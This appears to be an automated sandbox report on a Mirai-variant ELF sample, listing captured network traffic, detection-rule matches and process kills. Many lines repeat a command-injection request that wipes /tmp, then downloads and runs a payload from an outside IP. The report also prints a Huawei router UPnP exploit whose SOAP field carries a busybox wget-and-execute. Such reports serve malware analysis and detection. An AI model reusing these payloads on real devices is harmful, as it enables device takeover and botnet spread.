              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficDNS traffic detected: DNS query: woofwoof.cfd
              Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: s8y4CBbFHW.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: s8y4CBbFHW.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

              System Summary

              barindex
              Source: s8y4CBbFHW.elf, type: SAMPLEMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: s8y4CBbFHW.elf, type: SAMPLEMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5441.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 5441.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5438.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 5438.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5439.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 5439.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5432.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 5432.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5436.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 5436.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3104, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3161, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3162, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3163, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3164, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3165, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3170, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3182, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3212, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5438, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5439, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5441, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5457, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5458, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5459, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5460, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5461, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5462, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5478, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5487, result: successfulJump to behavior
              Source: xfce4-panel.xml.new.32.drOLE indicator, VBA macros: true
              Source: xfce4-panel.xml.new.32.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3104, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3161, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3162, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3163, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3164, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3165, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3170, result: successfulJump to behavior
